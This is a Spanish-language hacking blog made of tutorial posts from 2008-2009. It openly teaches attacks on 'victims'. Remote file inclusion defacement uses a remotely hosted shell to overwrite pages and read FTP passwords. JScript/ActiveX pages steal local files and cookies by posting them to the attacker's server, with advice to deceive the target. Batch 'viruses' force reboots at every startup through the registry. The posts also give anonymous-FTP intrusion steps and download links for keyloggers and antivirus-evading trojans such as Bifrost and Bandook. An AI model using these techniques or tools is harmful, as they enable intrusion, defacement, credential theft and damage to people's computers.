Rario's Blog

Deface por RFI

noreply@blogger.com (Rario) — Fri, 04 Sep 2009 20:41:00 +0000

Como ya Explique, Esta tecnica se basa en un bug de webs programadas en PHP.
Esta tecnica nos deja meter nuestra Shell para poder ejecutar comandos Linux/Unix.

Ahora Empezemos. Un Pequeño Ejemplo imaginemonos que nos encontramos esta Web:

°º¤ø,¸¸,ø¤º°`°º¤ø,¸
www.Rario.com/index.php?seccion=Links
°º¤ø,¸¸,ø¤º°`°º¤ø,¸

Lo Primero que tenemos que hacer es ver si podemos meterle nuestra Shell, Asi:

°º¤ø,¸¸,ø¤º°`°º¤ø,¸
www.Rario.com/index.php?seccion=http://yo.tuhost.com/Rario/shell.gif?&cmd=ls
°º¤ø,¸¸,ø¤º°`°º¤ø,¸

Dejenme Explicarles como Funciona:

www.Rario.com
Esta es la web Vulnerable
---
Index.php? Tambien conocido como Main. php?, Home.php? etc...
Esta es la Pagina Principal
---
seccion=
Variable en PHP para ir a alguna Seccion especial tambien puede cambiar
---
http://yo.tuhost.com/Rario/yo.gif
Url de Nuestra Shell, si no Tienes tu Host Abre uno (Yo recomiendo Miarroba)
Siempre ponle una extencion diferente, que no sea Php, Html etc... para mas
seguridad pone extencion Gif, Sh etc... Por que sino la estariamos corriendo
en Nuestra maquina.
---
?&cmd=
Esto le pondremos despues de nuestra URL con la shell para ejecutar un Comando.
---
LS
Este es el Comando de Linux a ejecutar,nos enlista los archivos del servidor

Al introducir nuestra shell con exito no debera salir una tabla con datos del Servidor.
Tambien te Dice si tienes permiso de Escritura si los tienes ya tienes tu deface.

Un deface simple es Ponerle un "Echo Hacked by Rario"
Si en la tabla de tu shell te aparece la pagina principal asi:

°º¤ø,¸¸,ø¤º°`°º¤ø,¸
www/home/rario
°º¤ø,¸¸,ø¤º°`°º¤ø,¸

Solo tenemos que hacer esto:

°º¤ø,¸¸,ø¤º°`°º¤ø,¸
www.Rario.com/index.php?seccion=http://yo.tuhost.com/Rario/shell.gif?&cmd=cd/www/home/Rario/;echo Hacked by Rario>index.php
°º¤ø,¸¸,ø¤º°`°º¤ø,¸

Al introducir esta direccion esto es lo que Pasa:

CD
Nos lleva a alguna carpeta en esta caso www/home/rario
---
;Echo
este Comando muestra en la pantalla un texto en este caso Hacked by Rario
---
>
Este Comando inserta el comando anterior a algun archivo en este caso Index.php

Tambien se podria buscar el Archivo Config.php,Ahi se encuentra la contraseña del FTP
Para hacer esto tendriamos que introducir algo asi:

°º¤ø,¸¸,ø¤º°`°º¤ø,¸
www.Rario.com/index.php?seccion=http://yo.tuhost.com/Rario/shell.gif?&cmd=cd/www/home/rario/;cat config.php
°º¤ø,¸¸,ø¤º°`°º¤ø,¸

y nos Mostrara algo asi:

Host:RarioBlog
User:Rario
Password:Blog

Con esto puedes usar un cliente FTP y subir tu index mejorado.

Pero si no tuvieramos permiso de escritura,pasaremos a buscar archivos y carpetas que tengan permisos.

Para Buscar dichos archivos se introduciria algo asi:

°º¤ø,¸¸,ø¤º°`°º¤ø,¸
www.rario.com/index.php?seccion=http://yo.tuhost.com/rario/shell.gif?&Cmd=cd/www/home/rario/;find -perm 777
°º¤ø,¸¸,ø¤º°`°º¤ø,¸

Find
El comando Find pues tal como dice (en ingles) sirve para Buscar
---
-perm 777
Significa Permisos

En pocas palabras te enlistara todos los archivos con permiso para que los Defaces.

Por Ultimo, Si al meter tu shell te sale un error quiere decir que la web tiene bugs en su PHP, consiguete un RPVS para buscar vulnerabilidades en esa Web.

Si al introducir tu shell te lleva a la pagina principal es que esta bien actualizada asi que empieza a buscar otra web =D.

Introduccion al RFI

noreply@blogger.com (Rario) — Fri, 04 Sep 2009 20:07:00 +0000

Hola, Ahora les enseñare como Hacer un Deface por RFI, pero te preguntaras que es RFI No?...
Esta es la Respuesta:

RFI (Remote file Inclision)
Es una tecnica de defacing que explota un bug en webs programadas en php, el problema radica en
un include que esta mal puesto y nos deja meter nuestra shell para hacer nuestro RFI

Ok..., Pero que es una Shell?
Es un sencillo programa dedicado para ejecutar comandos mas rapido, sin necesitar alguna interfaze grafica....por ejemplo la shell de Windows seria CMD, Pero en este caso al ser PHP Necesitaremos una shell que ejecute comandos Linux/Unix

Esta Bien pero como consigo Una?
Pues se los Dejo Facil, Aqui hay 138 Shells a escoger =D
http://www.mediafire.com/?3zykklaw2yd
Pass: Rario

Ya tienes una Shell, Ya sabes que es un RFI pero como usas la Shell?
pues miren estos son los Comandos de Unix/Linux mas comunes y probablemente los unicos que vamos a usar

ls Nos enlista los archivos y carpetas del servidor web
cd Nos sirve para saltarnos a alguna carpeta
cat Nos muestra el codigo fuente del algun archivo
id Nos dice si tenemos permisos de escritura
mkdir Con este comando borramos algun archivo
wget Subimos un archvio

Hacking con JScript II

noreply@blogger.com (Rario) — Fri, 04 Sep 2009 19:48:00 +0000

<html>
<body>
<script language="javascript">
var shell = new ActiveXObject ("WScript.Shell");
shell.Run("C:\windows\system32\logoff.exe")
</script>
</body>
<center><code><h1>The Rario Blog</h1></code>
</html>

Este es otro codigo en JScript,si tu victima lo acepta se ejecuta
C:\Windows\System32\logoff.exe
Con este simple codigo estamos cerrando la sesion del usuario.
porsupuesto pueden ejecutar cualquier archivo en la pc del usuario.

Unos ejemplos

C:\WINDOWS\system32\dfrg.exe ==> Sirve para desfragmentar el Disco Duro
C:\WINDOWS\system32\calc.exe ==> Abre la calculadora
C:\WINDOWS\system32\edit.exe => Muestra algunas librerias y las podemos editar
C:\WINDOWS\system32\format.exe => Formate Unidades de Disco
C:\WINDOWS\system32\mspaint.exe => Abre Paint
C:\WINDOWS\system32\notepad.exe => Abre Block de notas
C:\WINDOWS\system32\osk.exe ==> Muestra Teclado en pantalla

El programa que quieran abrir Siempre debe de estar dentro de la Variable shell.run C:\....

Hacking con JScript

noreply@blogger.com (Rario) — Mon, 20 Jul 2009 19:53:00 +0000

Lo que vamos a lograr con este Tutorial es algo parecido a un XSS (En el caso de querer Robar cookies o algun archivo del HD) Tambien veremos como tener control de alguna aplicacion de nuestra victima e intentaremos sacar informacion de alguno de sus atchivos y lo mandaremos a nuestro servidor.

Pare esto Nescesitaremos un servidor les recomiendo mucho el de Mi@
Conocimientos basicos en JScript
Editor para paginas web en HTLM (Podemos usar el Bloc de Notas)

Tengo que mencionar que esta vulnerabilidad solo funciona con el navegador Internet Explorer y Similares

El Lenguaje JavaScript sirver para reducir la libertad del usuario en nuestras paginas web,Aun que en si no podamos colocar nunguna operacion realmente peligrosa, Salvo explotando Bugs del los navegadores.En Cambio JScript es una Implementacion de JavaScript que funciona en los Navegadores como internet Explorer,Lo que caracteriza a Jscript es que puede Sacar Muchas mas Operaciones que JavaScript y permite interactuar con Windows con ActiveX lo cual nos da un gran poder sobre la Maquina,Pasemos a lo Interesante:

Robando Informacion en C:\

Empezemos..Abran su Editor HTLM y coloquen el Siguiente Codigo dentro de los Targets
<Html> </Html>

<html>
<body>
<form name=f method=post action=prueba.htm>
<input type=hidden name=datos>
</form>
<script Language=JScript>
var obj = new ActiveXObject("Scripting.FileSystemObject");
var file = obj.GetFile("C:\prueba.txt");
var stream = file.OpenAsTextStream(1, -2);
var line = stream.ReadLine();
document.f.datos.value = line;
stream.Close();
document.f.submit();
</script>
</body>
<center><code><h1>www.TheRarioBlog.blogspot.com</h1></code>
</html>

Siempre que IE va a leer un texto JScript te pide si estas seguro que puede ser dañiño etc... dile a tu victima que es una descarga o algo inventale un "premio" utiliza tu imaginacion.

Si acepto leer la pagina con el codigo de arriba como ejemplo acabas de extraer lo que se encuentra en la ubicacion C:\\prueba.txt y copiar todo el contenido a tu servidor en la pagina prueba.htm,este es un Sencillo ejemplo de lo que puedes hacer con JScript ... bien puedes sacarle el archivo C:\Documents and Settings\usuario\cookies\usuario@hotmail.msn[1].txt y sacarle el usuario de hotmail (donde dice usuario debes de cambiarle al nombre de la sesion de su PC)

Los Virus en Batch II

noreply@blogger.com (Rario) — Sun, 19 Jul 2009 20:51:00 +0000

Ahora crearemos un Virus “Mortal” para una PC de alguien. Esta es la base del Virus:

@Echo Off
Title Apagar
shutdown -r -f -t 5
exit

Este Código apagara la Computadora en 5 Segundos.
Pero Imaginense Que se Ejecute cada vez que La PC se prenda…
Pues eso es lo que Aremos

Lo Primero que Tenemos que Hacer es Crearlo en una Carpeta Escondida para el Ojo Humano Mortal.

Despues Agregarlo al Registro en RUN

Y Eso se logra Asi:

@echo off
CD C:\Windows\system32
Echo @echo off > virus.bat
Echo .
Shutdown -r -s -t 5 >> virus.bat
Echo Exit >> virus.bat
Exit

Entienden lo Que Hemos Hecho no? Pues si No Vuelvan a Leer todo los post de batch desde el Principio y Frente a una PC.

Ahora solo tenemos que Agregarlo al Registro y eso se Hace Asi:

reg add hkey_local_machine\software\microsoft\windows\curr entversion\run/v virus.bat/t reg_sz /d C:\windows\system32 /f

Y Listo Ya tenemos su Primer Virus.

Los Virus en Batch

noreply@blogger.com (Rario) — Sun, 19 Jul 2009 20:46:00 +0000

Hola Todos. Primero antes que Nada déjenme Explicarles el Comando :

Shutdown Este Comando Puede Variar de los Attributos que lo Acompañen
-R Se reiniciara el Equipo
-s Se Apagara el Equipo
-F Se apagara Forzosamente
-t Indica el Tiempo en el que se apagara la PC
-c Puedes Incluir un Mensaje

Ahora si Empecemos.

Empezemos con Algo Basico…

Un Bucle
Un Bucle es un Virus que Abrira ventanas o Programas hasta que los cierres
Ejemplo:

@Echo Off
Title Bucle
Goto Bucle
:Bucle
Start TheRarioBlog.Blogspot.Com
Goto Bucle

Imaginense lo que Pasa, Pobre tipo si no lo logra cerrar al principio del bucle tendrá que reiniciar.

Un Matador de Procesos
Lo que Aremos es Eliminar el MSN y Apagar la PC En 10 Segundos con el Mensaje: Muajajajajajajajajajajajajaja

@Echo Off
TaskKill /F /I Msnmsgr.exe
Shutdown –s –t 10 –c “Muajajajajajajajajajajajajaja”

El Clásico Chinga PC’S con Vacuna
Ahora con este nos Desharemos de los .Exe (no de forma permanente)

@Echo Off
Title Chinga PC’S
Assoc* .exe=.Rario

*Ese comando Hace que Los .Exe se Traten de Abrir como .Rario que no Existe para arreglarlo vuelve a ascociar un .exe con el .exe (si lo vas a probar trae la vacuna en una USB ya que no puedes abrir el bloc o créala antes

Mas Comandos

noreply@blogger.com (Rario) — Sun, 19 Jul 2009 20:40:00 +0000

En el Próximo Post Nos adentraremos en La introducción a los Virus. Así que tengo que empezar a enseñarles comandos relacionados a aplicaciones y virus. Empecemos.

Estos son Los Comandos Básicos a Recordar

DEL Borra Archivos. Por Ejemplo:

@Echo Off
Title Borrar
Del /Q /S /F C:\Windows\System32\Rario
Exit

Aquí Estoy Eliminando La Carpeta Rario del System32.
Del Tiene Sub-Comandos Por Decirlo Así que Hacen Esto:

\P Pide Confirmación Para Borrar
\Q Modo Silencioso (No Pide Confirmación)
\F Fuerza Bruta… También Borra Archivos de Solo Lectura
\S Borra También los Subdirectorios

Start Ejecutas un Archivo o Abres una Pagina web Ejemplo:

@Echo Off
Title Blog
Start TheRarioBlog.Blogspot.Com
Exit

Este Comando Abriria Mi Pagina Web con Tu Explorador Predeterminado

TaskKill Mata un Procesó (/F Fuerza Bruta)
Format (Unidad) Formateas un Disco Duro
Msg* Abre una Ventana con Un Mensaje.
Reg Add Añade una Entrada al Registro
> Crea un Archivo
>> Se Salta hasta la Ultima Linea del Archibo e Incluye lo Que Desee
Ejemplo:

@Echo Off
Title TXT
Echo TheRarioBlog.blogspot.com>C:\Rario.txt
Con este Comando se crea un .TXT con mi Pagina en C:\

* Substituye Cualquier Archivo Posible Ejemplo:

@Echo Off
Title Substituir
Del /Q /f *.JPEG
Exit

Esto Elimina TODOS los Archivos JPEG

? Substituye una Letra Ejemplo:

@Echo Off
Title Substituir II
Del /Q /f AB?.*
Exit

Esto Eliminara Todos los Archivos Con El Nombre AB y Cualquier Otro Carácter.

CHDIR o CD Cambia al Directorio Indicado

CD C:\Windows Te Envía a la Carpeta Windows o la Deseada
CD.. Ir al Directorio Superior
CD\\ Ir a la Raiz

ATTRIB Muestra y te Permite Cambiar los Atributos del Archivo Indicado Ejemplo:

@Echo Off
Title Attrib
Attrib C:\Rario (Digamos que me dice que esta Oculto)
Attrib C:\Rario -H

Con El Parametro /S Buscas Tambien en Subdirectorios.

Los atributos son:
H = Oculto
R = Lectura
S = Sistema.
A = Modificado.
Se activan o Desactivan con el Simbolo + o – Antes de la Letra

Estos y Los comandos que as Vistos son Comandos Básico Ahora es Hora de pasar a los Virus.

Introducir Datos en Batch

noreply@blogger.com (Rario) — Sun, 19 Jul 2009 20:27:00 +0000

Ahora explicare como Poder hacer un Questionaro por decirlo así ya que el siguiente comando tiene muchos usos.
Ahora pondré un pequeño ejemplo con Comandos mas Avanzados. Que Sera Explicado a continuacion

REM Ustedes Escriban esto en Minúsculas ya que es Sensitivo
@Echo Off
Title Ejemplo Datos
Set Var=Hacker
Echo.
Color C
Echo Quieres Ser un %Var%
Echo.
Pause
Rem ---Hasta aquí Todo Bien no?---
Goto Datos

:Datos
Color A
Cls
Echo.
Set/p Rario= Si o No?:
If %Rario%==Si Goto Hacker
If %Rario%==si Goto Hacker
Rem ------Ponlo asi por que es sensitivo a las Mayusculas---
If %Rario%==No Goto Loser
If %Rario%==no Goto Loser

:Error
Rem –-- Si pone algo diferente automáticamente es enviado a la siguiente sección---
Echo -------------------
Echo ERROR Introduce Si o No
Echo -------------------
Pause
Goto Datos

:Hacker
Cls
Echo O Yeah!!
Echo Asi se hace =D
Pause null
Exit

:Loser
Cls
Echo =( Entonces para que lees esto
Pause Null
Goto Datos

Lo de Arriba fue un Ejemplo Avanzado y muy corto…
Así que Prepárense. Ahora explicare que Hacen Todos los Nuevos Comandos

: Este Pequeño Comando te Sirve para Separar el Codigo en Secciones

GOTO Sirve para Cambiar entre Secciones

Set\P %Var%= Sirve para Que el Usuario incluya una variable al programa un Ejemplo de su Uso Mas común para los Novatos:

@Echo Off
Title Ejemplo Miscelaneo
Set\P Nombre=Cual es tu Nombre?:
Pause
Echo.
Echo Tu Nombre es %Nombre%
Pause null
Exit

Logrando Introducir una Variante directamente desde El programa.

IF Este Comando es Complicado. Primero empecemos Viendo los de IF*.
(Todos Los Atributos deben Tener IF Primero)

%Variable%==Valor (Comando) **
Esto Hace que Si el Valor de la Variable es Igual al Introducido se Procese un Comando

%Variable% LSS Valor (Comando)
Solo para Valores Numéricos. Si el Valor es menor al Introducido va a Procesar el Comando

%Variable% GTR Valor (Comando)
Solo para Valores Numéricos. Si el Valor es Mayor al Introducido va a Procesar el Comando

%Variable% LEQ Valor (Comando)
Solo para Valores Numéricos. Si el Valor es menor o Igual al Introducido va a Procesar el Comando

%Variable% GEQ Valor (Comando)
Solo para Valores Numéricos. Si el Valor es Mayor o Igual al Introducido va a Procesar el Comando

*También Existe el Comando IF NOT Que hace lo Contrario. (IF= SI… IF NOT= Si No..)
**También Tengo que Decir que Si pones el Primer comando entre Paréntesis y Después ELSE y otro comando Si el Primer Comando no se Puede Procesar se Procesara el Segundo

Variables en Batch

noreply@blogger.com (Rario) — Sun, 19 Jul 2009 20:19:00 +0000

Espero que lo de Abajo les haiga quedado lo suficientemente claro ya que fue muy sencillo no? Les recomiendo que Escriban usando solamente Minúsculas. Empecemos.
¿Que es una Variable?
Una Variable es un tipo de dato que puede ser introducido y recordado dentro de la memoria de la PC.
Vamos a poner un Pequeño Ejemplo:
@Echo Off
Title Ejemplo Variable
Set Var=Hacker
Echo Quieres Ser un %Var%
Pause
Exit
Guárdenlo Como un .BAT y vean lo que hace. Las variables tienen muchas formas de ser usadas y son necesarias en cualquier programa de computadora avanzado… y también para los simples.
Ahora a explicar lo que paso Arriba.
Al Poner el Comando:
Set Var=Hacker
Ponemos La Variable Var (puede ser llamada como sea) como Hacker para que cuando ocupemos mostrar la Variable pongamos el nombre de ella entre %% en este caso %Var% se muestre la Palabra Hacker.
Hagan un pequeño .BAT con dos Variables y sigamos a el siguiente Post.

Aprendiendo un Poco de Batch

noreply@blogger.com (Rario) — Sun, 19 Jul 2009 20:03:00 +0000

Hola todos. Para empezar a programar en batch empezaremos por lo más básico. El Clásico HELLO WORLD.
Para empezar habran el Bloc de Notas o como recomiendo yo instalen (o descarguen) el Notepad C++ Ahora lo primero que se debe hacer en un código batch es lo siguiente:

@Echo Off
Así es como empezaremos cualquier código seguido del titulo:
Title (El Titulo Que le Quieras Poner)
---
*Color A
Esto es Opcional, Cambia el color de las letras a verde si quieres saber que colors hay y su código Abre la consola (Menu de inicio-Ejecutar-Cmd) y teclea Color\?,Poniendo dos Seguidos Pones el Color Del Fondo y del Texto.

Ahora les Mostrare Una serie de comandos que tienen que tienen que recordar para por lo menos tener una noción básica de Batch

ECHO. Esto deja un espacio en el texto
ECHO Con esto muestras algún mensaje en el programa
REM Dejas un Comentario en el Codigo
PAUSE Pausas el Código pero dice Presiona enter para Continuar
PAUSE >Null Pausas pero no Dice nada presiona enter para continyar

Ahora Copien este Ejemplo en el Bloc de Notas

Ejemplo:

@Echo Off
Color A
Rem ------------ Texto -------------
Echo Hello World
Echo.
Pause
CLS
Rem -------- Cambiando a Rojo ----------
Color 4
Echo Funciono No?
Pause > null

Ahora Hagan un Guardar como y Guarden: Ejercicio 1.BAT Se va a guardar como un Icono Blanco con un Engrane no? Ejecútenlo y Traten de Comprender lo de arriba. En la Segunda Edición explicare como cambiarlo a .exe y cambiarle el icono.
Para terminar esta Lección Creen su propio programa con Todos los comandos mencionados hasta ahora y Hagan que cuente una pequeña historia.

¿Que Son Los Virus?

noreply@blogger.com (Rario) — Sat, 03 Jan 2009 05:51:00 +0000

Hola a todos ^^ Antes de empezar el Tercer tutorial me gustaria darles a ententer que es un "Virus" y sus Tipos:

Virus:
Un virus informático es un programa de computadora que tiene la capacidad de causar daño y su característica más relevante es que puede replicarse a sí mismo y propagarse a otras computadoras. Infecta "entidades ejecutables": cualquier archivo o sector de las unidades de almacenamiento que contenga códigos de instrucción que el procesador valla a ejecutar. Se programa en lenguaje ensamblador y por lo tanto, requiere algunos conocimientos del funcionamiento interno de la computadora.

Gusano o Worm:
Es un Tipo de Virus o programas que tratan de reproducirse a si mismo, no produciendo efectos destructivos sino el fin de dicho programa es colapsar el sistema o ancho de banda replicandose a si mismo

Caballos de Troya o Camaleones:
Son programas que permanecen en el sistema, no ocasionando acciones destructivas sino todo lo contrario suele capturar datos generalmente password enviándolos a otro sitio, o dejar indefenso el ordenador donde se ejecuta, abriendo agujeros en la seguridad del sistema, con la siguiente profanación de nuestros datos.
El caballo de troya incluye el código maligno en el programa benigno, mientras que los camaleones crean uno nuevo programa y se añade el código maligno.

Joke Program:
Simplemente tienen un payload (imagen o sucesión de estas) y suelen destruir datos.

Bombas Logicas o de Tiempo:
Programas que se activan al producirse un acontecimiento determinado. la condición suele ser una fecha (Bombas de Tiempo), una combinación de teclas, o un estilo técnico Bombas Lógicas), etc... Si no se produce la condición permanece oculto al usuario.

Retro Virus:
Este programa busca cualquier antivirus, localiza un bug (fallo) dentro del antivirus y normalmente lo destruye.

Con esto espero darles a todos a entender que tipos de virus hay no? pero que metodos de contagio existen?

Existen dos grandes clases de contagio. En la primera, el usuario, en un momento dado, ejecuta o acepta de forma inadvertida la instalación del virus. En la segunda, el programa malicioso actúa replicándose a través de las redes. En este caso se habla de gusanos.

En cualquiera de los dos casos, el sistema operativo infectado comienza a sufrir una serie de comportamientos anómalos o imprevistos. Dichos comportamientos pueden dar una pista del problema y permitir la recuperación del mismo.

Dentro de las contaminaciones más frecuentes por interacción del usuario están las siguientes:

* Mensajes que ejecutan automáticamente programas (como el programa de correo que abre directamente un archivo adjunto).
* Ingeniería social, mensajes como ejecute este programa y gane un premio.
* Entrada de información en discos de otros usuarios infectados.
* Instalación de software pirata o de baja calidad.

En el sistema Windows puede darse el caso de que el ordenador pueda infectarse sin ningún tipo de intervención del usuario (versiones Windows 2000, XP y Server 2003) por virus como Blaster, Sasser y sus variantes, por el simple hecho de estar, la máquina conectada a una red o a Internet. Este tipo de virus aprovechan una vulnerabilidad de desbordamiento de búfer y puertos de red para infiltrarse y contagiar el equipo, causar inestabilidad en el sistema, mostrar mensajes de error y hasta reinicios involuntarios, reenviarse a otras máquinas mediante la red local o Internet, entre otros daños. En las últimas versiones de Windows 2000, XP y Server 2003 se ha corregido este problema en su mayoría. De manera frecuente, el usuario deberá descargar actualizaciones y parches de seguridad.

Entendido? Pues con esto termino esta introduccion a los Virus y el siguiente tutorial

Intrusion por FTP by Rario

noreply@blogger.com (Rario) — Fri, 02 Jan 2009 22:52:00 +0000

Bueno aqui este metodo no aveces no funciona pero intentando todo sale ^^
cuando empezastes a leer ya debes de tener unas cuantas victimas no? Cada
quien tiene su motivo pero empezemos el segundo tutorial de infiltracion:

Como se supone que todos sabemos la shell de windows es el Command.com
o CMD ahora lo abrimos y demosle un color "A" por que asi me gusta mas =P

Listo? Color A? Ahora como va a ser una Intrusion por ftp tecleamos algo asi:

°º¤ø,¸¸,ø¤º°`°º¤ø,¸
FTP www.victima.com
°º¤ø,¸¸,ø¤º°`°º¤ø,¸

Te va a salir un mensaje del host del server al que se esta conectando

°º¤ø,¸¸,ø¤º°`°º¤ø,¸

Ahora conectado te pedira que te logues con un Username y password
Pero como Chingados voy a conseguir el user y la pass? algo asi estan pensando no?
pues la respuesta un simple bug de oro ^^ es entrar como r00t metiendonos como
Anonymous:

°º¤ø,¸¸,ø¤º°`°º¤ø,¸
User (victima.com:(none)): anonymous
°º¤ø,¸¸,ø¤º°`°º¤ø,¸

Si te sale algo asi:
331 anonymous login ok, send your complete email adress as your password.
Password:

Casi siempre significa que el Login es correcto pero Dice que metas el correo como pass?!
Entonces metamos nuestro correo ^-^... Intenten con correos como Webmaster@victima.com
Capiche?

NOTA: Al Colocar la Password no se muestran "*" Ni nada de esas cosas en cambio no se ve para que no te vayas a asustar por cierto @=alt+64

Keyloggers

noreply@blogger.com (Rario) — Fri, 02 Jan 2009 22:36:00 +0000

Los KeyLoggers son sistema de seguimiento de la actividad del teclado,con el que podremos registrar cualquier cosa que se escriba en el ordenador y varios aspectos relacionados con esas entradas.

Las opciones que incluyen son muy numerosas y útiles, convirtiéndose en unos sistemas de vigilancia casi implacable. A sus funciones de "keylogger" hay que sumarle las interesantísimas funciones de recordar tiempos y momentos de la apertura de las ventanas en las que se escribió y, además, la posibilidad de diferenciar caracteres especiales de los diferentes idiomas. En cuanto a las opciones que incluye hay que mencionar que puede capturar pantallas, mantenerse oculto, soporte de contraseña (al instalarse nos dan una de inicio), aviso inmediato por correo al detectar cierto texto escrito, envío de logs (el historial) mediante correo electrónico, mensajes de alerta predefinibles, etc.

Sin lugar a dudas los Keylogger son un excelente sistema de vigilancia que difícilmente nos podrá defraudar.

KGB Keylogger

rapidshare.com/files/179136380/KGB_Keylogger_by_Rario.rar

Golden Keylogger

rapidshare.com/files/179136379/Golden_Keylogger_by_Rario.zip

Fearless Key Spy

rapidshare.com/files/179136378/Fearless_KeySpy_v2.0_by_Rario.zip

PC-Spy Keylogger

rapidshare.com/files/179136381/PC-Spy_Keylogger_by_Rario.rar

Bifrost 1.2D

noreply@blogger.com (Rario) — Fri, 02 Jan 2009 22:32:00 +0000

La Version 1.2d del bifrost, supuestamente es una modificacion de la version 1.2c, version privada y oficial creada por KSV, que estaba a la venta por unos 200 dolares.
Alguien se quejo de que la detectaban algunos avs y la publico...
Dentro de todo lo que mas se destaca con respecto a versiones anteriores es el "file manager", se le agregaron muchisimas mejoras.
Tambien el server ahora corre en windows vista 64 bits y es mas indetectable, aunque no creo que dure mucho tiempo

-Mejoras en la ocultacion:
Indetectable a algunos antivirus y a todos los antivirus desactualizados hace unos meses.
Mejorado el sistema de salteo de firewall.

-Mejoras en la gestion de archivos:
Agregado gestor de descargas, permite cancelar, pausar, mover arriba, abajo, etc.
Aumentada la velocidad y estabilidad de las descargas.
Guarda datos en cache.
Permite ver vistas en miniaturas en imagenes jpg.
Agregada opcion para disminuir la velocidad de descarga asi se aumenta el ancho de banda.
Agregada opcion para reproducir sonidos con volumen maximo y por defecto.
Agregada vista "Treeview"

-Otras mejoras
El server corre en windows vista 64 bits, aunque el keylogger todabia sigue sin funcionar en este SO.
Agregada captura del clipboard en el keylogger.
Mejorada la estabilidad en el metodo de inicio activex.
Nueva columna en el cliente que muestra la ventana activa en cada victima.
Los datos de antivirus y firewall se extraen del centro de seguridad de windows.
Agregada funcion para captura de password de firefox 2.

http://rapidshare.com/files/178959913/Bifrost_1.2d_by_Rario.rar

Bandook 1.36

noreply@blogger.com (Rario) — Fri, 02 Jan 2009 21:31:00 +0000

Esta es una version privada del famoso y buen troyano Bandook, aca se las dejo, tiene nuevas funciones...

Cambios en Bandook 1.36:

- Banderas relacionados con Clientes Países En la lista de conexiones
VNC-fijo extensión
- Cargas utiliza FTP en modo pasivo ahora
- Instalación fija en Vista y Persistencia
- Cambio de Información [Añadido informe completo, Red de Información, Driver Info, Información de Procesos, etc ..]
- Añadido Puertos Monitor [Mostrar Conexión y Puertos y la lista de entrada]
PWS-fijo Plugin para el trabajo en Vista, IE 7 se agregó Retreiving Capacidad Contraseñas, contraseñas Plugins Actualizado a versiones más recientes
- Screen Recorder fijo en Vista, y fijo Raring El Cine en Dirs que contengan espacios
- Añadida función de actualización Web, Web Actualización de masas, selección y actualización de la web [Añadido en "Otros" submenu]
- Añadida función de actualización directa, ahora puede actualizar u ur Server persistencia incluso cuando está activada
- Eliminar opción funciona perfectamente ahora, con persistencia y sin permitido
- Subir fijo en Gestor de archivos (se Guardar como apertura en lugar de Open File)
- Captura de pantalla fija, Cam, Keylogger en XP modificaciones después de Vista
- Se ha corregido un error con Keylogs Subir Configuración automática de lectura / Aplicando
Keylogger-Obras en Windows Vista ahora
- Imágenes / Cam Shots trabaja ahora en un número limitado de cuentas
- Servidor de FTP fija en Vista
- Corregido un error en Tiny Archivo Raring que estaba haciendo de archivos rar No
- Plugins ahora instalado en la carpeta Bandook (obras en un número limitado de cuentas)
- Nuevo método de instalación
- Bandook obras en Cuentas de usuario limitada ahora
persistencia de actualización por lo que trabaja ahora en Vista
Bandook-install / Pistas silenciosamente en Vista
- Vista Compatibilidad fijo [no funcionaba en lo absoluto]
- Añadido Network Manager con soporte para Unicode (señalará acciones, la descarga, carga, Borrar)
Multi-Language Interface, Bandook ahora es traducible a ur la Lengua Materna

http://rapidshare.com/files/178959912/Bandook_1.36_by_Rario.rar

SSS 7.97

noreply@blogger.com (Rario) — Fri, 02 Jan 2009 21:14:00 +0000

Shadow Security Scanner es un completísimo y efectivo escáner de vulnerabilidades para la plataforma de Windows nativa, aunque también examina servidores de cualquier otra plataforma revelando brechas en Unix, Linux, FreeBSD, OpenBSD y Net BSD.

Por su arquitectura, Shadow Security Scanner también descubre fallos en CISCO, HP y otros equipos de la red. Actualmente, los servicios analizados son: FTP, SSH, Telnet, SMTP, DNS, Finger, HTTP, POP3, IMAP, IRC, Windows Media Service, Terminal Service, NetBIOS, NFS, NNTP, SNMP, Squid, LDAP, HTTPS, SSL, TCP/IP, UDP y servicios del Registro.

Lo análisis son muy rápidos y se ofrecen informes de cada una de las vulnerabilidades y sus posibles soluciones, además de actualizarse automáticamente a través de Internet.

http://rapidshare.com/files/178942516/SSS_7.97_by_Rario.rar

Intrusion por NetBIOS by Rario

noreply@blogger.com (Rario) — Sat, 25 Oct 2008 21:46:00 +0000

Pues en Este momento Espero Explicarlos en las proximas entradas los metodos de Intrusion mas conocidos y faciles Aqui empieza el Primero:

NetBIOS:

¿Que es NetBIOS?
NetBIOS, "Network Basic Input/Output System" es una interfaz de para accesos a servicios de Red,Desde su Creacion NetBIOS se a convertido en fundamento un para las Redes

¿Para que Sirve el NetBIOS?
NetBIOS, normalmente es un regalo para los hackers de Microsoft ya que el NetBIOS solo sirve para 2 casos: Un servidor web (Como se manejan por Tcp/Ip No se ocupa) o un Windows 98 que use Modem ya que sin NetBios no Podrian usar Internet.

¿Y Como se Hackea con NetBIOS?

Primero Tenemos que Escanear un Rango de IP's o Una sola IP Eso se puede hacer con el siguiente Batch (por by Klez.H{Es mas comvneiente que usar la consola}) o usando Los programas mencionados Abajo

@echo off
color 0a
title NetBIOS Hack
goto menu
:menu
cls
echo.
echo ±± ±± ±±±±±±± ±±±±±± ±±±±±± ±± ±±±±±±± ±±±±±±±
echo ±±± ±± ±±± ±± ±± ±± ±± ±± ±± ±±
echo ±± ± ±± ±±±±±±± ±± ±±±±±±± ±± ±± ±± ±±±±±±±
echo ±± ±±± ±±± ±± ±± ±± ±± ±± ±± ±±
echo ±± ±± ±±±±±±± ±± ±±±±±± ±± ±±±±±±± ±±±±±±±
echo.
echo ±± ±± ±±±±±±± ±±±±±± ±± ±±±
echo ±± ±± ±± ±± ±± ±± ±±±
echo ±±±±±±± ±±±±±±± ±± ±±±±±
echo ±± ±± ±± ±± ±± ±± ±±±
echo ±± ±± ±± ±± ±±±±±± ±± ±±±
echo.
echo ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo º Menu principal - Introduzca una opcion º
echo ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¼
echo ÉÍÍÍ» ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ÉÍÍÍ» ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
